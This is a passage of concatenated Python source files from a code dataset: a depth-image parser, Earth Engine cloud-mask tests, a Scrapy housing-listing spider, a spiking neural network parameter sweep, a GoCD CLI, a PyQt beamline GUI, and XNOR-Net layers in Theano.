state_transitions[[\n col for col in state_transitions.columns\n if col not in ['state', 'next_state']\n ]].to_csv(\n transitions_file,\n index=False\n )\n\n savefile = model_path.format(\n args['selected_model'],\n args['stock_name'],\n args['window_size'],\n str(e)\n )\n savedir = os.path.dirname(os.path.abspath(savefile))\n if not os.path.isdir(savedir):\n os.makedirs(savedir)\n\n agent.model.save(savefile)\n","sub_path":"train_dataframe.py","file_name":"train_dataframe.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598576239","text":"import argparse\nimport os\nimport scipy.misc\nimport numpy as np\nimport h5py\n \n \ndef parse_NYU(data_path, result_dir):\n print(data_path, result_dir)\n with h5py.File(data_path, 'r') as f:\n print(list(f.keys()))\n \n n = f['depths'].shape[0]\n print(n)\n for i in range(n):\n image0 = f['images'][i,:,:,:]\n depth = f['depths'][i,:,:]\n image = np.transpose(image0, (1, 2, 0)) \n \n print(image0.shape, image.shape, depth.shape)\n\n image = np.transpose(image, (1, 0, 2))\n depth = np.transpose(depth)\n\n rip = result_dir + str(i) + \"_image.jpg\"\n scipy.misc.imsave(rip, image)\n\n rdp = result_dir + str(i) + \"_depth.jpg\"\n scipy.misc.imsave(rdp, depth)\n\n\ndef main():\n # parse \n parser = argparse.ArgumentParser()\n parser.add_argument('data_path', help = 'nyu_depth_v2')\n parser.add_argument('result_dir', help = 'nyu_depth_v2 result path')\n \n args = parser.parse_args()\n parse_NYU(args.data_path, args.result_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/nyu_parser.py","file_name":"nyu_parser.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167437277","text":"import ee\nimport pytest\n\nimport openet.core.common as common\nimport openet.core.utils as utils\n\n\ndef test_ee_init():\n assert ee.Number(1).getInfo() == 1\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n\n ['0000000000000000', 1], # Designated Fill\n ['0000000000000001', 1],\n ['0000000000000010', 1], # Terrain Occlusion\n ['0000000000000010', 1], # Radiometric Saturation\n ['0000000000000010', 1],\n ['0000000000000010', 1],\n ['0000000000010000', 1], # Cloud\n ['0000000000110000', 1], # Cloud Confidence\n ['0000000001010000', 0],\n ['0000000001110000', 0],\n ['0000000010000000', 1], # Cloud Shadow Confidence\n ['0000000100000000', 1],\n ['0000000110000000', 0],\n ['0000011000000000', 1], # Snow/Ice Confidence\n ['0001100000000000', 1], # Cirrus Confidence (don't mask on cirrus )\n ]\n)\ndef test_landsat_c1_toa_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['BQA'])\n output_img = common.landsat_c1_toa_cloud_mask(input_img)\n assert utils.constant_image_value(ee.Image(output_img))['BQA'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, snow, expected\",\n [\n # Snow/Ice Confidence\n ['0000011000000000', None, 1],\n ['0000011000000000', False, 1],\n ['0000001000000000', True, 1],\n ['0000010000000000', True, 1],\n ['0000011000000000', True, 0],\n ]\n)\ndef test_landsat_c1_toa_cloud_mask_snow(img_value, snow, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['BQA'])\n input_args = {'input_img': input_img}\n if snow is not None:\n input_args['snow_flag'] = snow\n output_img = common.landsat_c1_toa_cloud_mask(**input_args)\n assert utils.constant_image_value(ee.Image(output_img))['BQA'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, cirrus, expected\",\n [\n # Cirrus Confidence (don't mask on cirrus for now)\n ['0001100000000000', None, 1],\n ['0001100000000000', False, 1],\n ['0000100000000000', True, 1],\n ['0001000000000000', True, 1],\n ['0001100000000000', True, 0],\n ]\n)\ndef test_landsat_c1_toa_cloud_mask_cirrus(img_value, cirrus, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['BQA'])\n input_args = {'input_img': input_img}\n if cirrus is not None:\n input_args['cirrus_flag'] = cirrus\n output_img = common.landsat_c1_toa_cloud_mask(**input_args)\n assert utils.constant_image_value(ee.Image(output_img))['BQA'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n\n ['0000000000000000', 1], # Designated Fill\n ['0000000000000001', 1],\n ['0000000000000010', 1], # Clear\n ['0000000000000100', 1], # Water\n ['0000000000001000', 0], # Cloud Shadow\n ['0000000000010000', 1], # Snow\n ['0000000000100000', 1], # Cloud\n ['0000000001100000', 1], # Cloud Confidence\n ['0000000010100000', 1],\n ['0000000011100000', 0],\n ]\n)\ndef test_landsat_c1_sr_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['pixel_qa'])\n output_img = common.landsat_c1_sr_cloud_mask(input_img)\n assert utils.constant_image_value(output_img)['pixel_qa'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, snow, expected\",\n [\n ['0000000000010000', None, 1],\n ['0000000000010000', False, 1],\n ['0000000000010000', True, 0],\n ]\n)\ndef test_landsat_c1_sr_cloud_mask_snow(img_value, snow, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['pixel_qa'])\n input_args = {'input_img': input_img}\n if snow is not None:\n input_args['snow_flag'] = snow\n output_img = common.landsat_c1_sr_cloud_mask(**input_args)\n assert utils.constant_image_value(output_img)['pixel_qa'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n ['0000000000000000', 1],\n ['0000010000000000', 0],\n ['0000100000000000', 0],\n ]\n)\ndef test_sentinel2_toa_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['QA60'])\n output_img = common.sentinel2_toa_cloud_mask(input_img)\n assert utils.constant_image_value(ee.Image(output_img))['QA60'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n ['0000000000000000', 1],\n ['0000010000000000', 0],\n ['0000100000000000', 0],\n ]\n)\ndef test_sentinel2_sr_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['QA60'])\n output_img = common.sentinel2_sr_cloud_mask(input_img)\n assert utils.constant_image_value(ee.Image(output_img))['QA60'] == expected\n\n\n# def test_sentinel2_toa_cloud_mask_deprecation():\n# \"\"\"Test that sentinel2_toa_cloud_mask returns a deprecation warning\"\"\"\n# with pytest.deprecated_call():\n# input_img = ee.Image.constant(int('0000010000000000', 2)).rename(['QA60'])\n# output_img = common.sentinel2_toa_cloud_mask(input_img)\n# assert utils.constant_image_value(ee.Image(output_img))['QA60'] == 0\n\n","sub_path":"openet/core/tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459111331","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re, requests\nfrom lxml import etree\nfrom scrapy import Request\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider,Rule\nfrom lianjia.items import LianjiaItem\n\nMAX_PAGE = 100\n\nclass HouseSpider(CrawlSpider):\n name = 'house'\n allowed_domains = ['lianjia.com']\n # start_urls = ['https://wh.lianjia.com/ershoufang/pg1/']\n\n # 只能爬到10页\n # rules = {\n # Rule(LinkExtractor(allow=r'/ershoufang/pg\\d+/'), callback='parse_item', follow=True)\n #\n # }\n\n # def parse_item(self, response):\n # item = LianjiaItem()\n # info_list = response.xpath('//ul[@class=\"sellListContent\"]/li')\n # for info in info_list:\n # item['title'] = info.xpath('./div[1]/div[@class=\"title\"]/a/text()').extract_first()\n # # 利用xpath string 提取文本内容\n # item['houseInfo'] = info.xpath('string(./div[1]/div[@class=\"address\"]/div)').extract_first()\n # item['positionInfo'] = info.xpath('string(./div[1]//div[@class=\"positionInfo\"])').extract_first()\n # item['followInfo'] = info.xpath('./div[1]/div[@class=\"followInfo\"]/text()').extract_first()\n # item['agentInfo'] = info.xpath('./div[1]/div[@class=\"agentInfoList\"]/a/text()').extract_first()\n # item['tag'] = info.xpath('./div[1]/div[@class=\"tag\"]/span/text()').extract_first()\n # item['totalPrice'] = info.xpath('string(./div[1]//div[@class=\"totalPrice\"])').extract_first()\n # item['unitPrice'] = info.xpath('./div[1]//div[@class=\"unitPrice\"]/span/text()').extract_first()\n # yield item\n\n def start_requests(self):\n base_url = 'https://{city}.lianjia.com/ershoufang/'\n citys = ['wh']\n areas = ['jiangan', 'jianghan', 'qiaokou', 'dongxihu', 'wuchang', 'qingshan', 'hongshan', 'hanyang',\n 'donghugaoxin', 'jiangxia', 'caidian', 'huangbei', 'xinzhou', 'zhuankoukaifaqu']\n for city in citys:\n url = base_url.format(city=city)\n for area in areas:\n area_url = url + area\n for i in range(0, MAX_PAGE):\n start_url = area_url + '/pg' + str(i+1)\n yield Request(start_url, callback=self.parse)\n\n def get_latitude(self, url):\n user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.22 \\\n Safari/537.36 SE 2.X MetaSr 1.0'\n headers = {'User-Agent': user_agent}\n content = requests.get(url=url, headers=headers).content.decode('utf-8')\n content = etree.HTML(content)\n data = content.xpath('/html/body/script[21]/text()')\n list = re.search(r\"resblockPosition:(.+)\", str(data)).group(1).split(',')\n # 去掉单引号和双反斜杠\n latitude = str(list[0].replace('\\\\\\'', '').strip() + ',' + list[1].replace('\\\\\\'', '').strip())\n return latitude\n\n def parse(self, response):\n item = LianjiaItem()\n info_list = response.xpath('//ul[@class=\"sellListContent\"]/li')\n for info in info_list:\n item['title'] = info.xpath('./div[1]/div[@class=\"title\"]/a/text()').extract_first()\n item['detail_url'] = info.xpath('./div[1]/div[@class=\"title\"]/a/@href').extract_first()\n item['city'] = response.xpath('//div[@class=\"crumbs fl\"]/a[1]/text()').extract_first()[3:-1]\n item['urban_area'] = response.xpath('//div[@class=\"crumbs fl\"]/h1/a/text()').extract_first()[:-3]\n\n # 利用xpath string 提取文本内容\n houseInfo = info.xpath('string(./div[1]/div[@class=\"address\"]/div)').extract_first().split('|')\n # 解析houseInfo\n item['community'] = houseInfo[0]\n item['housetype'] = houseInfo[1]\n item['area'] = houseInfo[2]\n\n item['positionInfo'] = info.xpath('string(./div[1]//div[@class=\"positionInfo\"])').extract_first()\n\n followInfo = info.xpath('./div[1]/div[@class=\"followInfo\"]/text()').extract_first().split('/')\n # 解析followInfo\n item['attentions'] = followInfo[0]\n item['watch_times'] = followInfo[1]\n item['publish'] = followInfo[2]\n\n # item['agentInfo'] = info.xpath('./div[1]/div[@class=\"agentInfoList\"]/a/text()').extract_first()\n # item['tag'] = info.xpath('./div[1]/div[@class=\"tag\"]/span/text()').extract_first()\n item['totalPrice'] = info.xpath('string(./div[1]//div[@class=\"totalPrice\"])').extract_first()\n item['unitPrice'] = info.xpath('./div[1]//div[@class=\"unitPrice\"]/span/text()').extract_first()\n item['latitude'] = self.get_latitude(item['detail_url'])\n yield item\n","sub_path":"scrapy/lianjia/lianjia/spiders/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501660344","text":"'''\nSPIKING MODEL\n----------------------\nRun simulation of recurrent spiking network across wide range of parameters.\nThe goal of this exhaustive search is to identify parameter combinations that yield\na low spontaenous firing rate (1-5 Hz) and low spike correlations (r < 0.10). \n----------------------\nBased on code from Wimmer et al. (2014), initial parameters from Wang (2002).\nAdapted by thmspfffr, 10/2018\n'''\n\nfrom brian import *\nimport numpy \nfrom numpy.random import rand as rand\nfrom numpy.random import randn as randn\nimport h5py\nimport os.path\nfrom subprocess import call\nfrom sys import platform\nimport elephant\nfrom neo.core import SpikeTrain\nfrom elephant.conversion import BinnedSpikeTrain\nimport quantities as pq\n\nif platform == 'darwin':\n root_dir = '~/Dropbox/projects/phd/spiking/'\nelse:\n root_dir = '/home/tpfeffer/spiking/'\n\nfrom integration_circuit_mod import make_integration_circuit\n\n# Version\nv = 6\n\nif __name__ == '__main__':\n\n #------------------------------------------------------------------------------ \n # Simulation parameters \n #------------------------------------------------------------------------------ \n # Timing \n runtime = 3000.0 * ms \n # Inputs: stimululus, AMPA, NMDA, GABA\n inputs = np.linspace(0,1.2,1.2/0.1+1) \n AMPA_mods = np.linspace(0.2,5,4.8/0.2+1)\n NMDA_mods = np.linspace(1,1,0/0.1+1)\n GABA_mods = np.linspace(0.2,5,4.8/0.2+1)\n # preallocate\n resp = np.zeros([len(AMPA_mods), len(NMDA_mods), len(GABA_mods), len(inputs)])\n mean_corr = np.zeros([len(AMPA_mods), len(NMDA_mods), len(GABA_mods), len(inputs)])\n for itr in range(ntrls):\n # Loop through exp parameters\n for igaba in range(0,GABA_mods.size): \n for iinp in range(0,inputs.size):\n for iampa in range(0,AMPA_mods.size):\n for inmda in range(0,NMDA_mods.size):\n\n fn = os.path.expanduser(root_dir + 'proc/pmod_spiketimes_iampa%d_inmda%d_gaba%d_inp%d_v%d_processing.txt') % (iampa, inmda, igaba, iinp,v)\n if os.path.isfile(fn)==False:\n call(['touch', fn])\n else:\n continue\n # initialize \n defaultclock.reinit()\n clear(True) \n\n print(\"Computing INPUT%d, GABA%d, AMPA%d and NMDA%d ...\") % (iinp, igaba,iampa,inmda)\n\n inp = 2000 * (inputs[iinp]**1.2 / (inputs[iinp]**1.2 + 0.133**1.2)) \n inh = 1\n AMPA_mod = AMPA_mods[iampa]\n NMDA_mod = NMDA_mods[inmda]\n GABA_mod = GABA_mods[igaba]\n\n Dgroups, Dconnections, Dnetfunctions, subgroups = make_integration_circuit(inp,GABA_mod,AMPA_mod,NMDA_mod)\n\n # get populations from the integrations circuit\n decisionE = Dgroups['DE']\n decisionI = Dgroups['DI']\n\n # ---- set initial conditions (random)\n decisionE.gen = decisionE.gen * (1 + 0.2 * rand(decisionE.__len__()))\n decisionI.gen = decisionI.gen * (1 + 0.2 * rand(decisionI.__len__()))\n decisionE.V = decisionE.V + rand(decisionE.__len__()) * 2 * mV\n decisionI.V = decisionI.V + rand(decisionI.__len__()) * 2 * mV\n\n # record spikes of excitatory neurons\n Sp_E = SpikeMonitor(decisionE, record=True)\n # record spikes of inhibitory neurons\n Sp_I = SpikeMonitor(decisionI, record=True)\n # record instantaneous excitatory populations activity\n R_E = PopulationRateMonitor(decisionE, bin=5*ms)\n # record instantaneous inhibitory populations activity\n R_I = PopulationRateMonitor(decisionI, bin=5*ms)\n # record voltage\n Vm_E = StateMonitor(decisionE, 'V', record=True)\n Vm_I = StateMonitor(decisionI, 'V', record=True)\n\n #------------------------------------------------------------------------------\n # Run the simulation\n #------------------------------------------------------------------------------\n print(\"Running simulation...\")\n net = Network(Dgroups.values(), Dconnections.values(), Dnetfunctions, Sp_E, Sp_I, R_E, R_I, Vm_E, Vm_I)\n net.prepare()\n net.run(runtime) \n\n # convert to array and save output has .h5 \n spt_E = []; spt_E_idx = []\n spt_I = []; spt_I_idx = []\n\n for ineuron in range(0,len(Sp_E.spiketimes)):\n spt_E = np.append(spt_E,Sp_E.spiketimes.values()[ineuron], axis=None)\n spt_E_idx = np.append(spt_E_idx,np.matlib.repmat(ineuron,1,len(Sp_E.spiketimes.values()[ineuron])), axis=None)\n\n for ineuron in range(0,len(Sp_I.spiketimes)):\n spt_I = np.append(spt_I,Sp_I.spiketimes.values()[ineuron], axis=None)\n spt_I_idx = np.append(spt_I_idx,np.matlib.repmat(ineuron,1,len(Sp_I.spiketimes.values()[ineuron])), axis=None)\n\n spt_E = np.vstack((spt_E,spt_E_idx))\n spt_I = np.vstack((spt_I,spt_I_idx))\n\n # COMPUTE SPIKE COUNT CORRELATIONS\n print(\"Computing spike count correlations...\")\n spikes = dict()\n first_spike = 1 # start analysis at 1s\n for ineuron in range(0,320):\n spikes[ineuron] = SpikeTrain(spt_E[0][(spt_E[1]==ineuron) & (spt_E[0]>first_spike)]*pq.s, t_start = 0.25, t_stop = 3.0)\n st = []\n subsamp = 1\n matidx = np.triu_indices(len(range(0,len(spikes),subsamp)),1)\n for isp in range(0,len(spikes),subsamp):\n st.append(spikes[isp])\n sts=BinnedSpikeTrain(st, binsize=10*pq.ms)\n corr=elephant.spike_train_correlation.corrcoef(sts)\n mean_corr = corr[matidx].mean()\n resp = sum(spt_E[0]>0.25)/(2.75*320)\n print(\"Saving output...\")\n hf = h5py.File(os.path.expanduser(root_dir + 'proc/pmod_spiketimes_iinp%d_ampa%d_nmda%d_gaba%d_v%d.h5') % (iinp, iampa, inmda, igaba, v), 'w')\n #hf.create_dataset('spt_E', data=spt_E)\n hf.create_dataset('spt_E_r', data=mean_corr)\n hf.create_dataset('spt_E_fr', data=resp)\n hf.close()\n\n\n","sub_path":"run_model_trials.py","file_name":"run_model_trials.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"648909945","text":"#!/usr/bin/env python3\n\nimport argparse\n\n\ndef main():\n \"\"\" Runs program and handles CLI interaction \"\"\"\n\n parser = argparse.ArgumentParser(\n description='''\\\nDownload pipeline data from GO.CD and store locally.\nSample usage: go_cli pull -p pipeline-name\n go_cli pull -p pipeline-name -s 1900 -n 10\n go_cli pull -p pipeline-name -s 750''',\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument(\n 'action',\n choices=['pull', 'info', 'export'])\n parser.add_argument(\n '-p', '--pipeline', type=str, default=None, help=\"Which PIPELINE to use.\")\n parser.add_argument(\n '-d', '--dry-run', action='store_true', default=False, help=\"Dry-run a command, without syncronizing or saving any data.\")\n parser.add_argument(\n '-n', '--next', type=int, default=None,\n help=\"Pull the subsequent NEXT number of pipeline counts from GO. Defaults to the number of pipelines currently not synced locally.\")\n parser.add_argument(\n '-s', '--start', type=int, default=0, help=\"Pull from START pipeline count.\")\n parser.add_argument(\n '-f', '--filename', type=str, default=\"cli_save\", help=\"FILENAME to save in ~/GO_CSV/\"\n )\n\n pargs = parser.parse_args()\n\n from gocddash.analysis import go_request\n from gocddash.analysis import actions\n\n if pargs.action == 'pull':\n if not pargs.pipeline:\n raise ValueError(\"No pipeline specified.\")\n if pargs.next is None:\n pargs.next = go_request.get_max_pipeline_status(pargs.pipeline)[0] - pargs.start\n actions.pull(pargs.pipeline, pargs.next, pargs.start, pargs.dry_run)\n elif pargs.action == 'export':\n if not pargs.pipeline:\n raise ValueError(\"No pipeline specified.\")\n actions.export(pargs.pipeline, \"~/GO_CSV/\" + pargs.filename + \".csv\", pargs.dry_run)\n elif pargs.action == 'info':\n if pargs.pipeline:\n actions.info(pargs.pipeline)\n else:\n actions.all_info()\n else:\n print(\"I have nothing to do.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"go_cli.py","file_name":"go_cli.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277583115","text":"from PyQt4 import QtCore,QtGui\nfrom controls import ControlsGroup\nfrom graph import Graph\nfrom backend import controlLoop, Voltage, Beamline\n\nfrom copy import deepcopy\n\nclass BeamlineApp(QtGui.QMainWindow):\n\n def __init__(self):\n super(BeamlineApp, self).__init__()\n\n self.beamline = Beamline()\n\n self.container = Container()\n self.controlsGroup = ControlsGroup(self.beamline)\n self.graph = Graph(self.beamline)\n self.init_UI()\n \n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.update)\n self.timer.start(30)\n\n def update(self):\n self.beamline.update()\n for c in self.controlsGroup.controls.values():\n c.update()\n self.graph.updateGraph()\n\n\n def init_UI(self):\n self.setCentralWidget(self.container)\n self.container.layout.addWidget(self.graph,0,0)\n self.container.layout.addWidget(self.controlsGroup,1,0)\n\n self.makeToolbar()\n\n self.show()\n\n def makeToolbar(self):\n self.toolbar = QtGui.QToolBar()\n self.toolbar.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.addToolBar(self.toolbar)\n\n self.saveAction = QtGui.QPushButton('Save',self)\n self.saveAction.clicked.connect(self.controlsGroup.save)\n self.toolbar.addWidget(self.saveAction)\n\n self.loadAction = QtGui.QPushButton('Load',self)\n self.loadAction.clicked.connect(self.controlsGroup.load)\n self.toolbar.addWidget(self.loadAction)\n\n self.optimizeAction = QtGui.QPushButton('Optimize',self)\n self.optimizeAction.clicked.connect(self.controlsGroup.optimize)\n self.toolbar.addWidget(self.optimizeAction)\n\n def closeEvent(self,event):\n self.beamline.controlProcess.terminate()\n for v in self.controlsGroup.beamline.voltages.values():\n v.stopRamp = True\n event.accept()\n\n def keyPressEvent(self,e):\n self.controlsGroup.keyPressed(e)\n e.ignore()\n\n\n\nclass Container(QtGui.QWidget):\n def __init__(self):\n super(Container,self).__init__()\n self.layout = QtGui.QGridLayout(self)\n","sub_path":"BeamlineApp.py","file_name":"BeamlineApp.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93988021","text":"def repeated_word(string):\n word_array = []\n lowered_string = string.lower()\n for word in lowered_string.split():\n if word in word_array:\n print(word)\n return word\n break\n else:\n word_array.append(word)\n\nrepeated_word('Dog cat turtle dog')","sub_path":"challenges/repeated_word/repeated_word.py","file_name":"repeated_word.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88917313","text":"\"\"\" Class and method definition for the layers in XNOR-Net\n\"\"\"\nimport theano\nimport theano.tensor.nnet\nimport numpy as np\nimport lasagne\nimport theano.tensor as T\nimport time\nfrom external.bnn_utils import binary_tanh_unit\n\ndef binarize_conv_filters(W):\n \"\"\"Binarize convolution weights and find the weight scaling factor\n W : theano tensor : convolution layer weight of dimension no_filters x no_feat_maps x h x w\n \"\"\"\n # symbolic binary weight\n Wb = T.cast(T.switch(T.ge(W, 0),1,-1), theano.config.floatX) #Wb = sign(W)\n \n alpha = T.mean( T.reshape(T.abs_(W), (W.shape[0], W.shape[1]*W.shape[2]*W.shape[3])), axis=1) #每个卷积核单独计算\n\n return Wb, alpha\n\ndef binarize_conv_input(conv_input, k):\n\n bin_conv_out = binary_tanh_unit(conv_input) # x[x<0] = -1 x[x>=0] = 1\n\n # scaling factor for the activation.\n A =T.abs_(conv_input)\n\n # K will have scaling matrixces for each input in the batch.\n \n k_shape = k.eval().shape #(batch_size,channel,height,width) k的height,width 和卷积核的height,width一致\n pad = (k_shape[-2]/2, k_shape[-1]/2) #k的height和width都是奇数\n # support the kernel stride. This is necessary for AlexNet\n K = theano.tensor.nnet.conv2d(A, k, border_mode=pad) # K's shape = (batch_size, 1, map_height, map_width)\n\n return bin_conv_out, K #输入的二值化\n \n\n\ndef binarize_fc_weights(W):\n # symbolic binary weight\n Wb = T.cast(T.switch(T.ge(W, 0),1,-1), theano.config.floatX) # Wb = sign(W) \n\n alpha = T.mean(T.abs_(W), axis=0)\n return Wb, alpha\n\ndef binarize_fc_input(fc_input): ####这里怎么不变形状成为向量呢??????????????是因为有其他地方去处理吗\n\n bin_out = binary_tanh_unit(fc_input)\n \n if(fc_input.ndim == 4): # prev layer is conv or pooling. hence compute the l1 norm using all maps\n beta = T.mean(T.abs_(fc_input), axis=[1, 2, 3])\n\n else: # feeding layer is FC layer\n beta = T.mean(T.abs_(fc_input), axis=1)\n\n return bin_out, beta\n\n\n\nclass Conv2DLayer(lasagne.layers.Conv2DLayer):\n \"\"\" Binary convolution layer which performs convolution using XNOR and popcount operations.\n This is followed by the scaling with input and weight scaling factors K and alpha respectively.\n \"\"\"\n\n def __init__(self, incoming, num_filters, filter_size, xnor=True, **kwargs):\n\n \"\"\"\n Parameters\n -----------\n incoming : layer or tuple\n Ipnut layer to this layer. If this is fed by a data layer then this is a tuple representing input dimensions.\n num_filters: int\n Number of 3D filters present in this layer = No of feature maps generated by this layer\n filter_size: tuple\n Filter size of this layer. Leading dimension is = no of input feature maps.\n \"\"\"\n self.xnor = xnor \n\n # average filter to compute scaling factor for activation\n no_inputs = incoming.output_shape[1] #输入数据的channel\n shape = (num_filters, no_inputs, filter_size[0], filter_size[1]) #(num_of_filters,channel,height,width) 卷积核\n\n\n num_inputs = int(np.prod(filter_size)*incoming.output_shape[1]) #卷积核的元素个数\n num_units = int(np.prod(filter_size)*num_filters) #??????????\n self.W_LR_scale = np.float32(1./np.sqrt(1.5 / (num_inputs + num_units))) #????????为啥啊\n\n if(self.xnor):\n #xnor参数初始化保证在-1~1之间\n super(Conv2DLayer, self).__init__(incoming,num_filters, filter_size, W=lasagne.init.Uniform((-1, 1)), **kwargs) \n self.params[self.W] = set(['xnor']) #????????\n else:\n super(Conv2DLayer, self).__init__(incoming, num_filters, filter_size, **kwargs)\n\n\n if self.xnor:\n # beta用来近似输入\n #每个卷积核对应一个输入单元,这个输入单元要有一个beta_filter\n beta_filter = np.ones(shape=shape).astype(np.float32) / (no_inputs*filter_size[0]*filter_size[1]) #shape = (num_of_filters,channel,height,width) \n self.beta_filter = self.add_param(beta_filter, shape, name='beta_filter', trainable=False, regularizable=False)\n \n Wb = np.zeros(shape=self.W.shape.eval(), dtype=np.float32) #存储二值化权重\n #xalpha用来近似权重\n xalpha = lasagne.init.Constant(0.1) \n self.xalpha = self.add_param(xalpha, [num_filters,], name='xalpha', trainable=False, regularizable=False)\n #xalpha 对于每个filter计算一次 shape = (num_filters,)\n\n def convolve(self, input, deterministic=False, **kwargs): \n \"\"\" Binary convolution. Both inputs and weights are binary (+1 or -1)\n This overrides convolve operation from Conv2DLayer implementation\n \"\"\"\n if(self.xnor):\n # compute the binary inputs H and the scaling matrix K\n input, K = binarize_conv_input(input, self.beta_filter) #二值化的输入和K\n\n # Compute the binarized filters are the scaling matrix\n self.Wb, alpha = binarize_conv_filters(self.W) #二值化的权重和alpha\n \n if not deterministic: #训练过程\n old_alpha = theano.clone(self.xalpha, share_inputs=False) #赋值\n old_alpha.default_update = alpha \n alpha += 0*old_alpha\n else:#不训练\n alpha = self.xalpha \n \n #alpha.shape = (num_of_filters,)\n \n Wr = self.W #Wr保持原来的初始的参数\n\n self.W = self.Wb #网络使用二值化的参数去进行卷积forward,backward\n\n feat_maps = super(Conv2DLayer, self).convolve(input, **kwargs) #二值化的输入和二值化的权重的卷积结果\n \n self.W = Wr #恢复原始精度\n\n #注意,这里有问题,Conv2D卷积操作自动添加了bias,应该最后再加的。。。。FIXME\n feat_maps = feat_maps * K #点乘,K需要扩维广播\n\n feat_maps = feat_maps * alpha.dimshuffle('x', 0, 'x', 'x') #alpha 扩维成(1,num_of_filters,1,1),再广播运算 #最终的近似卷积结果\n \n else:#普通卷积\n feat_maps = super(Conv2DLayer, self).convolve(input, **kwargs)\n \n return feat_maps\n\nclass DenseLayer(lasagne.layers.DenseLayer):\n \"\"\"Binary version of fully connected layer. XNOR and bitcount ops are used for \n this in a similar fashion as that of Conv Layer.\n \"\"\"\n\n def __init__(self, incoming, num_units, xnor=True, **kwargs):\n \"\"\" XNOR-Net fully connected layer\n \"\"\"\n self.xnor = xnor\n num_inputs = int(np.prod(incoming.output_shape[1:])) #输入的元素数(单个输入,no batch)\n self.W_LR_scale = np.float32(1./np.sqrt(1.5/ (num_inputs + num_units))) #num_units是全连接层的输出单元数\n if(self.xnor):\n super(DenseLayer, self).__init__(incoming, num_units, W=lasagne.init.Uniform((-1, 1)), **kwargs)\n self.params[self.W]=set(['xnor'])\n else:\n super(DenseLayer, self).__init__(incoming, num_units, **kwargs)\n\n if self.xnor:\n #Wb = np.zeros(shape=self.W.shape.eval(), dtype=np.float32)\n xalpha = np.zeros(shape=(num_units,), dtype=np.float32) #权重近似系数\n self.xalpha = self.add_param(xalpha, xalpha.shape, name='xalpha', trainable=False, regularizable=False)\n #self.Wb = self.add_param(Wb, Wb.shape, name='Wb', trainable=False, regularizable=False)\n\n def get_output_for(self, input, deterministic=False, **kwargs):\n \"\"\" Binary dense layer dot product computation\n \"\"\"\n if(self.xnor):\n # binarize the input\n bin_input, beta = binarize_fc_input(input)\n\n # compute weight scaling factor.\n self.Wb, alpha = binarize_fc_weights(self.W)\n \n if not deterministic:#训练\n old_alpha = theano.clone(self.xalpha, share_inputs=False)\n old_alpha.default_update = alpha #??????????????\n alpha += 0*old_alpha\n else:#不训练\n alpha = self.xalpha\n\n #W_full_precision = self.Wb * alpha.dimshuffle('x', 0)\n Wr = self.W\n self.W = self.Wb\n \n #同样的,这里有问题,不应该先添加bias\n fc_out = super(DenseLayer, self).get_output_for(bin_input, **kwargs)\n \n fc_out = fc_out * beta.dimshuffle(0, 'x')\n\n fc_out = fc_out * alpha.dimshuffle('x', 0)\n \n #self.W = W_full_precision\n self.W = Wr\n else:\n fc_out = super(DenseLayer, self).get_output_for(input, **kwargs)\n\n return fc_out\n\n # find the dot product\n # scale the output by alpha and beta\n\n","sub_path":"train/xnor_net.py","file_name":"xnor_net.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377593246","text":"\"\"\"File 15panelDiscreteBis.py\n\n:author: Michel Bierlaire, EPFL\n:date: Sun Sep 8 19:30:31 2019\n\n Example of a discrete mixture of logit models, also called latent class model.\n The datafile is organized as panel data.\n Here, we integrate before the discrete mixture to show that it is equivalent.\n Three alternatives: Train, Car and Swissmetro\n SP data\n\"\"\"\n\nimport pandas as pd\nimport biogeme.database as db\nimport biogeme.biogeme as bio\nimport biogeme.models as models\nimport biogeme.messaging as msg\nfrom biogeme.expressions import Beta, DefineVariable, bioDraws, \\\n PanelLikelihoodTrajectory, MonteCarlo, log\n\n# Read the data\ndf = 